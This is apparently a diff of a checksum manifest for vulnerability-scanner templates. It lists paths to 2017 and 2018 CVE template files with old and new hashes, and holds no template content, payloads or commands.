+http/cves/2017/CVE-2017-1000029.yaml:580376ecf00ff97715bbe7e464fb4cc36c06bfad +http/cves/2017/CVE-2017-1000163.yaml:2e09adb0f2f1725a4f3f1f0652dedd6bb653cf6d +http/cves/2017/CVE-2017-1000170.yaml:1c163d27714dbf30844494d21bd36f7a53a60bc1 +http/cves/2017/CVE-2017-1000486.yaml:a6d51881322a5b42926eae5d7ebf01fb548e0e2d +http/cves/2017/CVE-2017-10075.yaml:f5855d17d3159ef2891d11116779660c6836d7db http/cves/2017/CVE-2017-10271.yaml:d491104d4e9533329f27d45146063dd7b9bd3d32 -http/cves/2017/CVE-2017-10974.yaml:da11f1dab1f059d851d085eb9da2863e701625fd -http/cves/2017/CVE-2017-11165.yaml:62cb1f640d45cda0a2d45bbd565ce842e5ffae68 -http/cves/2017/CVE-2017-11444.yaml:c40824c6c2e804e84c469624f354435b5e0d37ea -http/cves/2017/CVE-2017-11512.yaml:9eb7919e2019c2ae66dea663ad6623e9c0676202 -http/cves/2017/CVE-2017-11586.yaml:2adea3a3e42e7cc3efbe4c9b4632d17fcc278a62 +http/cves/2017/CVE-2017-10974.yaml:5fd8ee2be0b71efd342f89dab810636202d896b9 +http/cves/2017/CVE-2017-11165.yaml:bb09d7a47c9d5bbf9d13ee2d32291dba5a2e90b8 +http/cves/2017/CVE-2017-11444.yaml:9dcfbd3f1a0fcfb36f52b3cdab7e5f4a96d9e96d +http/cves/2017/CVE-2017-11512.yaml:3c187ea7d1b43d724a68cabe652d0345531fb3ae +http/cves/2017/CVE-2017-11586.yaml:8c499a9594e3259134e9b0fa50b21e926df64ba9 http/cves/2017/CVE-2017-11610.yaml:d65650c579eca57f3cddbef4b45ed3fc125f71de -http/cves/2017/CVE-2017-11629.yaml:f9b2cbd65134695f8f59facfcde87542e952ce24 -http/cves/2017/CVE-2017-12138.yaml:6ce452f27d6051f08ecf6a8a2f736ad2b07bc9e1 +http/cves/2017/CVE-2017-11629.yaml:2d5014b59228a8ab430cd0d5d7dcb61b1ae71ec3 +http/cves/2017/CVE-2017-12138.yaml:bc2e758bdef0c11e0f4234e3d550a44f71da8461 http/cves/2017/CVE-2017-12149.yaml:36a1bbebcfdd62ea32c3ec9e30589c86a9bad553 -http/cves/2017/CVE-2017-12542.yaml:1c13f97e8567f274a9c3b1ffa62b2be11dfe45e6 -http/cves/2017/CVE-2017-12544.yaml:5966969f12a5f7ac29e327e4e60fc98043073b04 -http/cves/2017/CVE-2017-12583.yaml:d421c523fced62166230c1d9b0ba0941d6b52002 +http/cves/2017/CVE-2017-12542.yaml:103dbaa965dfad41abfc8d124a0e1dc906a05ef3 +http/cves/2017/CVE-2017-12544.yaml:323e7e4e0f9a9a93898d275e89d7661e87421769 +http/cves/2017/CVE-2017-12583.yaml:b42e8868fe2ade4fbe380491e195574919384c73 http/cves/2017/CVE-2017-12611.yaml:6c7d56f5de2e8218e3247981d2c3413b72cd3a8d -http/cves/2017/CVE-2017-12615.yaml:9bbdbee00fbdb72ed33937152b62ccff302806ed -http/cves/2017/CVE-2017-12617.yaml:0db5077b2ec85da0e15a2dc235153b6d8d7dffa5 +http/cves/2017/CVE-2017-12615.yaml:d60b651ea59185beaf14f8de18e708932c004505 +http/cves/2017/CVE-2017-12617.yaml:3105bb10ea53d324452cef50cece09334bba73c8 http/cves/2017/CVE-2017-12629.yaml:ac3ccb9c808947506bef16d7ca95f6617b567c39 http/cves/2017/CVE-2017-12635.yaml:8ad42aac15973767a778ff7f20dea04c20cb3a5f -http/cves/2017/CVE-2017-12637.yaml:e9b019e64a789e73bfb09fe72ce70e192db93d1b -http/cves/2017/CVE-2017-12794.yaml:59c7585c877cd30896d4e8b69e9b54d4785ced37 -http/cves/2017/CVE-2017-14135.yaml:1a3154fcba4ca90b861b1ae6c2957b75642a4347 -http/cves/2017/CVE-2017-14186.yaml:5618a5cb87f02f901fe9aecbc5b169591cf8abac -http/cves/2017/CVE-2017-14524.yaml:de4386a9cab33c4a48984d066b23b7c7c3337866 -http/cves/2017/CVE-2017-14535.yaml:d4914783ae16bbd1beda8a0bea23b12b70e0a8c8 -http/cves/2017/CVE-2017-14537.yaml:d2e4d7b54ea007b3f13d5da59ecea1f47238ed4e -http/cves/2017/CVE-2017-14622.yaml:38355e56d139183903be350956393411fdc68eb6 -http/cves/2017/CVE-2017-14651.yaml:ba98cf85e22270db3ab897594985d6d4fd7c1552 -http/cves/2017/CVE-2017-14849.yaml:21d41d5af004c9101521d1c48003dfaf29d04409 -http/cves/2017/CVE-2017-15287.yaml:cd5de851e1ded8bb6d7a55f5b3687da86dd8bacd -http/cves/2017/CVE-2017-15363.yaml:bfdd75d7cfa7622a141c00faa1198976e77be166 -http/cves/2017/CVE-2017-15647.yaml:db36951c175e565ad4cec2ce4a31b41625e908c9 -http/cves/2017/CVE-2017-15715.yaml:8e58fa3ad5cb90765ba3d3149ba87e0e28e29383 +http/cves/2017/CVE-2017-12637.yaml:406e79a5c4376949f788bb388ed2707936633d21 +http/cves/2017/CVE-2017-12794.yaml:e3b293366805f65a82488e55a201beebb2d4a8e9 +http/cves/2017/CVE-2017-14135.yaml:5935f25c30f96318b6a999d6b67f76c03dd0a8b6 +http/cves/2017/CVE-2017-14186.yaml:95b3194d7b1a68e687b546d88b7f1fb4f01b5b0d +http/cves/2017/CVE-2017-14524.yaml:ed0506f6c1c632492aa0d4ad6ddbc6360fdbb9f9 +http/cves/2017/CVE-2017-14535.yaml:863224ac4b2d9e2a61550c022490168f18e880ac +http/cves/2017/CVE-2017-14537.yaml:2bcc0b97e39aff8a621c4863901d635d23ed65df +http/cves/2017/CVE-2017-14622.yaml:7219a14e2501d27cdd3bdfaf17ef4ceeef0793a8 +http/cves/2017/CVE-2017-14651.yaml:5d207b552693490cc99fc40e7bab96a1329e8ef5 +http/cves/2017/CVE-2017-14849.yaml:9d53860dbfc6988b5b302d38fcbdaba57d907216 +http/cves/2017/CVE-2017-15287.yaml:254057045e5cc856a6997d9ba28a3dab2756cffa +http/cves/2017/CVE-2017-15363.yaml:58741421c7bdf3f59e92908964d50e84dfefd77e +http/cves/2017/CVE-2017-15647.yaml:2eac046c7e737ef1a95d90c5be807d1d33e84252 +http/cves/2017/CVE-2017-15715.yaml:202ef07d1d1eb5d279f97bcbd6c4a47fed4ff514 http/cves/2017/CVE-2017-15944.yaml:9beae0a673dea9c479744f16a8bedfd1aef47c75 -http/cves/2017/CVE-2017-16806.yaml:e7368c1f36924b25d3614ec7e6b8d6c4945d2bfe -http/cves/2017/CVE-2017-16877.yaml:3021ef6a24e16217c6d50c6b482e00466f1d206b -http/cves/2017/CVE-2017-16894.yaml:a057c8eea7e1912b436aa4c34a422f60a3933820 -http/cves/2017/CVE-2017-17043.yaml:62188c2afa02a3913f0f5adcf57962762ef10259 -http/cves/2017/CVE-2017-17059.yaml:409390042083d7bdadf44746c3c033683b1e4c63 -http/cves/2017/CVE-2017-17451.yaml:66fb62fb9a9327f75f16b6eb401903c3e33a93f7 +http/cves/2017/CVE-2017-16806.yaml:d75db5cf58753175cce7f3115630ff82715f05e0 +http/cves/2017/CVE-2017-16877.yaml:a5f8dce5f85bfd25b43a0de5799f9cc673faa3f2 +http/cves/2017/CVE-2017-16894.yaml:fd54d9cc6fddfd7ee1a8b953a5e1f79e400264ed +http/cves/2017/CVE-2017-17043.yaml:7cbc4ec4ddbbfb21dbc0f2f11de1abd3f329d7e9 +http/cves/2017/CVE-2017-17059.yaml:b16fe513322b7908938532649a3390d77f37b37e +http/cves/2017/CVE-2017-17451.yaml:12797a7bdda9fe75ff74450683fe635b72ee576f http/cves/2017/CVE-2017-17562.yaml:1dcb93bbed45f9fc787e76aced34368a4995c7d0 -http/cves/2017/CVE-2017-17731.yaml:0582be7b7b643c9ebfdcec1987379e9de2ea6d38 -http/cves/2017/CVE-2017-17736.yaml:0c3602e2b75cbbe4ab5ea24d88f4c0180df6ccec -http/cves/2017/CVE-2017-18024.yaml:a552a73e69dc360e2571498266f383dfce58f22e -http/cves/2017/CVE-2017-18487.yaml:18e32b34c08c3504292252a7ac8ce9ff2389486d -http/cves/2017/CVE-2017-18490.yaml:4bae14fea268e6baa8d6f28831c5a5d0a080fd7b -http/cves/2017/CVE-2017-18491.yaml:069a867286351ca730e429c60c4a17b84672b24f -http/cves/2017/CVE-2017-18492.yaml:82d9ca146f62e49e8b41b522a723c51ff5ac0774 -http/cves/2017/CVE-2017-18493.yaml:0ab7a57c52b92d45195a16ab97a20e0bc9aabab6 -http/cves/2017/CVE-2017-18494.yaml:afbfc907ce0a8236c346e90d026d0a33e154d35c -http/cves/2017/CVE-2017-18496.yaml:f12b93d6a2402a797d6ddab934352b09fd404e75 -http/cves/2017/CVE-2017-18500.yaml:7ff13599c2eb3f69b1e0885198eae705cd3bf63b -http/cves/2017/CVE-2017-18501.yaml:dbde8c4de4002337046e5a1e81fba90f26c09979 -http/cves/2017/CVE-2017-18502.yaml:aca38af39a4a5924a56f86f3adeb34dad74f41a1 -http/cves/2017/CVE-2017-18505.yaml:130c3e41b57d0f508969b94479d4f107c8f8edb2 -http/cves/2017/CVE-2017-18516.yaml:9c59fccb87d293e6e733d3da5823bec264c533c6 -http/cves/2017/CVE-2017-18517.yaml:8a970b429d644fc9a41d3804bbd2959c990fb02b -http/cves/2017/CVE-2017-18518.yaml:64615c1a66061296920514744edb3d0a48412ff8 -http/cves/2017/CVE-2017-18527.yaml:b7fa4810800ea5466e68c1974adf7d9abf98f323 -http/cves/2017/CVE-2017-18528.yaml:03a9bcaf99fc59aaf0da26301a6ceee832e76c52 -http/cves/2017/CVE-2017-18529.yaml:eb9884fdf1d0b38677739f5701106fe4be49d43b -http/cves/2017/CVE-2017-18530.yaml:3ced30a75a95992d4b364176125b5067002ba1a3 -http/cves/2017/CVE-2017-18532.yaml:6d59db620eb5252b9339e495491a59954a0d8bdc -http/cves/2017/CVE-2017-18536.yaml:462191fcadf5fae20d78471d15f1b690b97d682d -http/cves/2017/CVE-2017-18537.yaml:de8310be2f49e4d471838c52d78a04cc30a8a52c -http/cves/2017/CVE-2017-18542.yaml:2d9a1b60870d9d4310e6b55f2152c052b3480f96 -http/cves/2017/CVE-2017-18556.yaml:6c35d1fa23ff7e2f4cfd92f039898eff8aabf02a -http/cves/2017/CVE-2017-18557.yaml:694aa8d4e02d61595f5a9bbb11fc26e3dfb10de6 -http/cves/2017/CVE-2017-18558.yaml:58934c166ca701770083b0eb6014c53fb05b1d4e -http/cves/2017/CVE-2017-18562.yaml:dd4172bc8473f190aeb46f5b26afd9fa8d324049 -http/cves/2017/CVE-2017-18564.yaml:08dfd96dc1b2ff028f064c0cfa60ea0f6c4556ae -http/cves/2017/CVE-2017-18565.yaml:f7579c963bbebaf051c0bf6c8bcbbc047c179e17 -http/cves/2017/CVE-2017-18566.yaml:3a3c45e95599102755e0bfb3ee820691dda33fda -http/cves/2017/CVE-2017-18598.yaml:fb270d3738edbdf020b36be592cf486668e2e18a -http/cves/2017/CVE-2017-18638.yaml:ceaf20db4156ee850363fb5f03c38577c6540075 -http/cves/2017/CVE-2017-3506.yaml:2e923049df918dd48d091fce0ea0f20026e2a653 -http/cves/2017/CVE-2017-3528.yaml:53dbae6f095668b50d2b4817161acbb1403c9389 -http/cves/2017/CVE-2017-4011.yaml:641c1f487ecf56f273fa290e0d54e3c8f282919f +http/cves/2017/CVE-2017-17731.yaml:ca1e5b46bdffc5fe50cd59714eb327bdd4228331 +http/cves/2017/CVE-2017-17736.yaml:dfc1cebe83807196b83adedf23ae2b467f00b53e +http/cves/2017/CVE-2017-18024.yaml:4ba92f756e6cd537c4b344f7ded7a72619d6526b +http/cves/2017/CVE-2017-18487.yaml:b900458630f0396fad7f48e3442bcac64fc33003 +http/cves/2017/CVE-2017-18490.yaml:c2f1a1d21bac9fca7fd9304c18aa6c399044312c +http/cves/2017/CVE-2017-18491.yaml:7a4567e84a8f3f68156858cac6e80827a6967a8a +http/cves/2017/CVE-2017-18492.yaml:9812aea2361a97f4d895bf88c1b916a0b2e31813 +http/cves/2017/CVE-2017-18493.yaml:cbff70f13bef37508102f909b61c9b6ba3fb19e1 +http/cves/2017/CVE-2017-18494.yaml:4e2508e44ec56ce1b68f300354687f82a6b900df +http/cves/2017/CVE-2017-18496.yaml:3cb511683d54da44134444e477c6d7cf93b7ad91 +http/cves/2017/CVE-2017-18500.yaml:bc3d409178ba8ad9b03b1efac64336556f299368 +http/cves/2017/CVE-2017-18501.yaml:efe8280bd9965baa3a409b057813826e072596ea +http/cves/2017/CVE-2017-18502.yaml:6c9c76698a05c87a509d6c18522fb46d7b5d7774 +http/cves/2017/CVE-2017-18505.yaml:7a4ad3ed8f2b0083a50afeb7f2338f8eb1c36717 +http/cves/2017/CVE-2017-18516.yaml:e50bbe5e44a1a3d23d7e5185ce2ab3b27c47f5d4 +http/cves/2017/CVE-2017-18517.yaml:3bdd5df136309e660039c811ed40f0d8851c01e2 +http/cves/2017/CVE-2017-18518.yaml:97adf4629f86b310450795f66a7d64ac3052469e +http/cves/2017/CVE-2017-18527.yaml:2d0dcee1014997a726829ed787304a482fb1a488 +http/cves/2017/CVE-2017-18528.yaml:ef31cf97fa9550a5b1483f876d102b4380d29bf2 +http/cves/2017/CVE-2017-18529.yaml:79e424bfea4e78b9f74448d0d1a36f492bd51189 +http/cves/2017/CVE-2017-18530.yaml:a692a6ef864d7b2f1b024a71fdb0112067ab72a6 +http/cves/2017/CVE-2017-18532.yaml:974214d00d2f489612ad1e79b45591addea8bcdd +http/cves/2017/CVE-2017-18536.yaml:c98925957a412fdb2e55b8176a2cf48188f7576a +http/cves/2017/CVE-2017-18537.yaml:929550fb01341205836385c2e36b5cde3105150f +http/cves/2017/CVE-2017-18542.yaml:7a077f0ef8331d7d280b1de32de0307e64f8780a +http/cves/2017/CVE-2017-18556.yaml:17990293db64ea959a8b3f8431f254d50af91976 +http/cves/2017/CVE-2017-18557.yaml:a14aec3b12ad89165894a3f24a89e07e034def49 +http/cves/2017/CVE-2017-18558.yaml:00652e719c20b0502a8c953a6b148c11f800d77a +http/cves/2017/CVE-2017-18562.yaml:01ac3e2d930cad4a5759d2078fac774d5b2544f8 +http/cves/2017/CVE-2017-18564.yaml:2789fa50a58d1126ca240ab8d16f1a6bbed7e5b9 +http/cves/2017/CVE-2017-18565.yaml:edf57d6dd79311a3e5bb890ebaa3e672b041a33b +http/cves/2017/CVE-2017-18566.yaml:502c1f441fe1235dca40385bd1c2a841c2358682 +http/cves/2017/CVE-2017-18598.yaml:e1aa2c38306618122044a01eb878667dee1cc48c +http/cves/2017/CVE-2017-18638.yaml:4528e98cb81f74d51dd8f8aad3e52f678452eeea +http/cves/2017/CVE-2017-3506.yaml:16c933caabc00f15c2fcda67d3eb8d8c17424b1f +http/cves/2017/CVE-2017-3528.yaml:850f88b58f59894e5c8a2a4aaaa57d71aa69fbf8 +http/cves/2017/CVE-2017-4011.yaml:41e7f8dd410b6efafdc9943402aefa9b087cfb6e http/cves/2017/CVE-2017-5487.yaml:207c8f92c5e2ce856c1aaa238b34779cfb8ab644 -http/cves/2017/CVE-2017-5521.yaml:debb974ee7ff40385825259d67a256ecad362d3c -http/cves/2017/CVE-2017-5631.yaml:734575905a9a339d5cf0b135091fe0a85e79f13f +http/cves/2017/CVE-2017-5521.yaml:f3865f0c1aed617750ca107ad5dada50447362e1 +http/cves/2017/CVE-2017-5631.yaml:3c216dec07fbb6f9a6672a4ea7f453be72c15d63 http/cves/2017/CVE-2017-5638.yaml:35bbc13688e4ec4e1d13602c78e0d1cdc2bb0f31 http/cves/2017/CVE-2017-5689.yaml:8388597c365f47be033e2ab6818211a3200179b1 -http/cves/2017/CVE-2017-5982.yaml:d9eb276ed6416754084c9ab59afca201272f86ad +http/cves/2017/CVE-2017-5982.yaml:7d9d172a91e79320b51917fe27b0c2c425473839 http/cves/2017/CVE-2017-6090.yaml:0a06423bae5ea9f50365faacad04658e4e122391 -http/cves/2017/CVE-2017-7269.yaml:dc0fe921efef952ad479b5acf251266ad77ca6ab -http/cves/2017/CVE-2017-7391.yaml:03ab572e1cd7e8baae9733663a8192ea7dc851ff -http/cves/2017/CVE-2017-7615.yaml:ec01c191aa377bf0ac0001ee10c938b4572efa54 -http/cves/2017/CVE-2017-7921.yaml:218e8efcef03bcf4b07b9945a22f0f5c13876c81 -http/cves/2017/CVE-2017-7925.yaml:f7247562167ddbd14daa34fd57733a4961165864 -http/cves/2017/CVE-2017-8229.yaml:7fe18ac2a77cc794a578c3cac45208bb65f7ecbd +http/cves/2017/CVE-2017-7269.yaml:ea014d633959ad6d0a59ce075b07d831b9edbae4 +http/cves/2017/CVE-2017-7391.yaml:8124b1ceeab4e6fc06f2863ecc351fb3876c3872 +http/cves/2017/CVE-2017-7615.yaml:c69935c8098cbe953fb0ae591807aac826678bdb +http/cves/2017/CVE-2017-7921.yaml:970f6a54b477a526b372b0cc37e6d7ab2668901a +http/cves/2017/CVE-2017-7925.yaml:17a225594967524191bfdb9180f1aa4bd659fe44 +http/cves/2017/CVE-2017-8229.yaml:6706f16db28bd79eb76e8afaaa696efad4c0257f http/cves/2017/CVE-2017-8917.yaml:83589e7baa37aeffa9401fd6726b1fbf67f8e4b6 -http/cves/2017/CVE-2017-9140.yaml:ead19f74984427eba51a6e93d484c3eac613e8fa -http/cves/2017/CVE-2017-9288.yaml:0e6fdbc83a6a13f034550bb7d1f81f9c89820d11 -http/cves/2017/CVE-2017-9416.yaml:be6683be7262c2caf263b0230c59ac0d1ceeb6b2 -http/cves/2017/CVE-2017-9506.yaml:accbd7d83ffb225cfdc6a4d13217083ea1f9c306 +http/cves/2017/CVE-2017-9140.yaml:fb20436dcd7494a682b945a0e74745c7ab2f0ac0 +http/cves/2017/CVE-2017-9288.yaml:f30c93a81c8faec9a5b42e567bd2fd859d0e8efe +http/cves/2017/CVE-2017-9416.yaml:ea7ad7c1bab65accf0055c307dec6413d588952a +http/cves/2017/CVE-2017-9506.yaml:1fd0f534947a2dd4a97f247596566d3ce6ac3ee4 http/cves/2017/CVE-2017-9791.yaml:2e7114610102c29a6b5e4f16b0bee0d90d75e934 http/cves/2017/CVE-2017-9805.yaml:16a849a9bc00a73aa6f751ecbd2f6fff793247da -http/cves/2017/CVE-2017-9822.yaml:05aa550af87ec498da727c9ee3e06de57e146693 -http/cves/2017/CVE-2017-9833.yaml:b847d8cc6e83dfeaf019a5471806b49b0d9209c1 -http/cves/2017/CVE-2017-9841.yaml:af72f3df431c43b747f87752b38cd061c868e2ce -http/cves/2018/CVE-2018-0127.yaml:868d0412e9a35b97dd9dc937d75243e405524e7d -http/cves/2018/CVE-2018-0296.yaml:7948e0c956faac388aceebcac24913bc55702b30 -http/cves/2018/CVE-2018-1000129.yaml:698fd1d0d1bac46b65a29c9c0bd502b8f094c78a -http/cves/2018/CVE-2018-1000130.yaml:459d675b06875198f8c0cab0af2ab0d2fd1da4d4 -http/cves/2018/CVE-2018-1000226.yaml:6c454dd4bfda27902e5e1cea417ccc8ac1612e3a +http/cves/2017/CVE-2017-9822.yaml:af1af6ab50a5f896f8594679c3d7944d28ca1fa9 +http/cves/2017/CVE-2017-9833.yaml:9a625fb78402c80e8a34c00dc5955a75235e465f +http/cves/2017/CVE-2017-9841.yaml:8a18b2715975cdfe0c33fd9e78f0e51a19af2335 +http/cves/2018/CVE-2018-0127.yaml:9e002c6abc5bb25d2ecdaa9f0059a561a37288ad +http/cves/2018/CVE-2018-0296.yaml:26c8bccdeb1e5e1ec359ac163d9c230d96d9b0e5 +http/cves/2018/CVE-2018-1000129.yaml:1f98d821231b7acae7187c5e56f37069538a6278 +http/cves/2018/CVE-2018-1000130.yaml:4593dda8f3904d5cbf0050d43d4b747e41af9a3c +http/cves/2018/CVE-2018-1000226.yaml:58351a6338258d85ae568b95b5c663e89f93896c http/cves/2018/CVE-2018-1000533.yaml:8285408776c11bdf1933f5915e2331cd59508edb -http/cves/2018/CVE-2018-1000600.yaml:de00214e03f83766f03fa6f178e56987c2e3f542 -http/cves/2018/CVE-2018-1000671.yaml:e89241351662f93481cf9773330d0e3697772c3a -http/cves/2018/CVE-2018-1000856.yaml:deb3c11e82221b4b95dbea6428e6ee44f857736f -http/cves/2018/CVE-2018-1000861.yaml:8558c908df44d6bddd5d4d72ccaf66001164daec -http/cves/2018/CVE-2018-10093.yaml:ca19c157f2f9dadaaec5e49bc81093fa356d3504 +http/cves/2018/CVE-2018-1000600.yaml:c47aca7947f2896d28a60054e34cb283a9e5b3fd +http/cves/2018/CVE-2018-1000671.yaml:c4986f6a54302343be73772bf170e7f3dfd522a3 +http/cves/2018/CVE-2018-1000856.yaml:e7f42347faa8592d42ef541ea28a069f86dfa807 +http/cves/2018/CVE-2018-1000861.yaml:edd13544afcf97b4da2c05fb13a7e5d8b8ff574c +http/cves/2018/CVE-2018-10093.yaml:1c8a2c1c1cad131dfcdf73e4902695750f14f970 http/cves/2018/CVE-2018-10095.yaml:693fc99ecffaf6a018148ec915e2f036df7a8a5b -http/cves/2018/CVE-2018-10141.yaml:5a7be0af6685b29580dc2f30f3cd6e9c16653625 -http/cves/2018/CVE-2018-10201.yaml:ccb2a9bb439568601a12cff450a41194915e94cc -http/cves/2018/CVE-2018-10230.yaml:f3f22bb4e2a650772a17cd29f7576655aa3b9db4 -http/cves/2018/CVE-2018-10562.yaml:4061af42048be9f4fcdee29f8007e73f7202016c +http/cves/2018/CVE-2018-10141.yaml:5d252d6574ddbc579a373828727d78de2c6eacca +http/cves/2018/CVE-2018-10201.yaml:5a8fdd34e137a742c1c9275c6a7713d5c5bbc687 +http/cves/2018/CVE-2018-10230.yaml:0fa7705e1aedbed55b7238956cf08ea0e885be12 +http/cves/2018/CVE-2018-10562.yaml:11ca4d568c5d82dcc9bf2108c3fc0504580c169d http/cves/2018/CVE-2018-10818.yaml:a7fa0aec3caa627fe454421831f62bc991eed9d6 -http/cves/2018/CVE-2018-10822.yaml:905a4d2af2d2ec76e3e8fbb3514321710102f955 +http/cves/2018/CVE-2018-10822.yaml:24f2902a68b8b2b193ef4d26b51f67e637041fa4 http/cves/2018/CVE-2018-10823.yaml:6618a7d4fcb625da1d59fb829ea829a029e3d203 -http/cves/2018/CVE-2018-10956.yaml:97922a3a41c45b0675c25a6fafaa9f6fc5c845ae -http/cves/2018/CVE-2018-11227.yaml:79ba46d719f9878baaf2be656f4c07ca58f84431 -http/cves/2018/CVE-2018-11231.yaml:07157f13212007b81adfa0da05d91e47fb1f3a98 +http/cves/2018/CVE-2018-10956.yaml:e406ff5917aed9d37e559d054746a90bb6fa942e +http/cves/2018/CVE-2018-11227.yaml:3a29ea7449fed935b92027337625ff929ef3d5f7 +http/cves/2018/CVE-2018-11231.yaml:31927614dd38c3e31fb452681d993e7154c1aa40 http/cves/2018/CVE-2018-11409.yaml:6fdfff18925eb21b11c3f46d55313bf032dc4e31 -http/cves/2018/CVE-2018-11473.yaml:d883901f6a247313ad835ce0a5002873e53b6ffb -http/cves/2018/CVE-2018-11709.yaml:3e458da28d0986bb89dff47fb8c450c611daf856 +http/cves/2018/CVE-2018-11473.yaml:207ceef40821efc2e4138b8e7306b0270e549145 +http/cves/2018/CVE-2018-11709.yaml:14503ee74e6d9543a8848cc085469db7000626cf http/cves/2018/CVE-2018-11759.yaml:204382efd7df17af751ac67bddcc8bd7cea49941 http/cves/2018/CVE-2018-11776.yaml:a36f7ba7796e879ff19d74fc11989596dcf388a1 -http/cves/2018/CVE-2018-11784.yaml:d42f036ba751d271e8c01bc9c62beb26571acf5f -http/cves/2018/CVE-2018-12031.yaml:c3a74040a8962aa5691093dbfba2a2ba6fa3d5ae -http/cves/2018/CVE-2018-12054.yaml:0c28ebafa9845a7e8b6ab7ba12ff2f85f95035af -http/cves/2018/CVE-2018-1207.yaml:6a20b469643cd0e931903a5861fd9aff5d591906 -http/cves/2018/CVE-2018-12095.yaml:925439dff157163c92e48cf43aeb749efc0ede48 -http/cves/2018/CVE-2018-12296.yaml:ca936d3abc1498ec7a679eb7445ebabdb2cf5f71 -http/cves/2018/CVE-2018-12300.yaml:cdd968be2ae7b7cd2e7eddbfbad3975f3f492322 +http/cves/2018/CVE-2018-11784.yaml:3637e094aff15b0cc2e2d137badeacb2478c69e8 +http/cves/2018/CVE-2018-12031.yaml:5f67c20e52e195056fed3e44e81ef7ac3d9068c6 +http/cves/2018/CVE-2018-12054.yaml:d365402285abd5450d7fbd4b27ba535415b82426 +http/cves/2018/CVE-2018-1207.yaml:fd31a7a8b782086c33de1d8aad9ea21a5c27ee49 +http/cves/2018/CVE-2018-12095.yaml:8dcf820144618324c45a2f19c4d6e58ce319299d +http/cves/2018/CVE-2018-12296.yaml:f86d493d479361e1cb9bb92ab463a749206e1f14 +http/cves/2018/CVE-2018-12300.yaml:5a79a73fcd7987c842bec3821a7f5da369d93e36 http/cves/2018/CVE-2018-12613.yaml:094314d99c7182e2e3858ca35508f930b51c5ae0 http/cves/2018/CVE-2018-12634.yaml:3abe3f739c93a307d7dfa8c0fad24182e4e1fcf0 -http/cves/2018/CVE-2018-12675.yaml:cc4d8c93f677d0a8d0aa7d679a8cd9419a587c42 -http/cves/2018/CVE-2018-1271.yaml:30380bccd3d4bf96479dcd5ff9393e73d165f379 -http/cves/2018/CVE-2018-1273.yaml:5742a777faad81b0724bc788009595039b313e26 -http/cves/2018/CVE-2018-12909.yaml:5e8e15d71c9c7608134587a325c2db8fb2571936 -http/cves/2018/CVE-2018-12998.yaml:735310cf02041dca4a48d939da17379061307e0e +http/cves/2018/CVE-2018-12675.yaml:2df2b2080236c56023a20d31716aa3f17bcd1217 +http/cves/2018/CVE-2018-1271.yaml:ac7dbf9714f7c4123c8d5872899cb0d5ec8232a1 +http/cves/2018/CVE-2018-1273.yaml:e57d58454c97cd3f94577316ff9e40f41c5eed54 +http/cves/2018/CVE-2018-12909.yaml:64bb71962dcd3561b8d864d56bf6942e84e0e290 +http/cves/2018/CVE-2018-12998.yaml:e2a81f7179f9858f31c377f5a366013f02154ad6 http/cves/2018/CVE-2018-1335.yaml:b78245c5ca237ca162b3085c826089ac0faafdb9 http/cves/2018/CVE-2018-13379.yaml:b975ad2818baa9df283a614b4f3a87c0537a9a0b -http/cves/2018/CVE-2018-13380.yaml:d68fa09a0f9b2325f9dc321653642bbbc0894734 -http/cves/2018/CVE-2018-13980.yaml:cf97274ab4f75a0bcdd71a9bdc6803ee587715aa -http/cves/2018/CVE-2018-14013.yaml:99f81db0fa8b3e00d8bddbb30d450dbf0390034c -http/cves/2018/CVE-2018-14064.yaml:b11cffc42871e4f943d19b7a73893afda5c78544 -http/cves/2018/CVE-2018-14474.yaml:5a1dcf292cefe7f48124ac06170c0b195d857934 -http/cves/2018/CVE-2018-14574.yaml:20f7fc722d5c2dbc5a8ba32ad94670be22bc3771 +http/cves/2018/CVE-2018-13380.yaml:116aaf7fcaf460fc96183109920041412b046451 +http/cves/2018/CVE-2018-13980.yaml:4b76ec27ca8ce448421c8447193247adfc8d5560 +http/cves/2018/CVE-2018-14013.yaml:fa018200771a50a8f8cd5a104db2ce96e64518e0 +http/cves/2018/CVE-2018-14064.yaml:e0a07e314efeeefe25293e20185be7c1f494b7aa +http/cves/2018/CVE-2018-14474.yaml:830a5c2ca8e019535a1395fc32e1cb8bc7029efd +http/cves/2018/CVE-2018-14574.yaml:5bd697daff07ed29adfb84aa75d2504950386001 http/cves/2018/CVE-2018-14728.yaml:2186f0d0c55614a45b9b3ec640517afccf7ef19b -http/cves/2018/CVE-2018-14912.yaml:5a04489921c581c1b1dccee3c3dcf021b8f99343 -http/cves/2018/CVE-2018-14916.yaml:11095698f07e3a5fb0105c467b4aff7766945eb9 -http/cves/2018/CVE-2018-14918.yaml:2806eee0ccbfde69af9757feb032148598c0350a -http/cves/2018/CVE-2018-14931.yaml:c644970dacdf5dee8cfbf254b042231515693b58 -http/cves/2018/CVE-2018-15138.yaml:dc4a1e473cecd9a4edd608f6a9e3628b3a213dc2 -http/cves/2018/CVE-2018-15517.yaml:ba78b70214c7399eafd50bdc2a5d586e22c1273c +http/cves/2018/CVE-2018-14912.yaml:b240bf2aff3f19469b5db0a238db041258e21290 +http/cves/2018/CVE-2018-14916.yaml:cc35f08153df4346096171b95cb424406797ea79 +http/cves/2018/CVE-2018-14918.yaml:e6cdd8127af8585ab4e265660e8ee745ffc6ce79 +http/cves/2018/CVE-2018-14931.yaml:6c9c5cd4db27c868f11b2d715e87bde115073d8f +http/cves/2018/CVE-2018-15138.yaml:aa1b3978bea87ccf678ed272f6a1833701932501 +http/cves/2018/CVE-2018-15517.yaml:954f70f19bb8308354bf9b398c52d733ee72cd36 http/cves/2018/CVE-2018-15535.yaml:333aeabcd402b87f8f0db53747ef9ce0d678ac20 -http/cves/2018/CVE-2018-15745.yaml:33e70a69a2a83a48ba4277d8131ff51a72f3859a -http/cves/2018/CVE-2018-15917.yaml:451991065ffd3af4f272514f4238a8bbc2efa466 +http/cves/2018/CVE-2018-15745.yaml:694413b3278afec50727e685600a29f0f0813ac6 +http/cves/2018/CVE-2018-15917.yaml:9552b5996c15ed491146f799a54e04afb2511735 http/cves/2018/CVE-2018-15961.yaml:bfd85de945a3f0be168b8ea7184cbf418ffee108 -http/cves/2018/CVE-2018-16059.yaml:3b52aa486dced9729e2634393e862912c7017aca -http/cves/2018/CVE-2018-16133.yaml:28004b0b4e39e14e421d8de679ca286d51079f03 -http/cves/2018/CVE-2018-16139.yaml:3de3720296e04d318615255498f2d0077b3c44f3 -http/cves/2018/CVE-2018-16159.yaml:53200d3007e7c3d0b18aa5fd59d3e274477343d8 -http/cves/2018/CVE-2018-16167.yaml:6b08334683e3426785ad46fe3854ce3ef17b0380 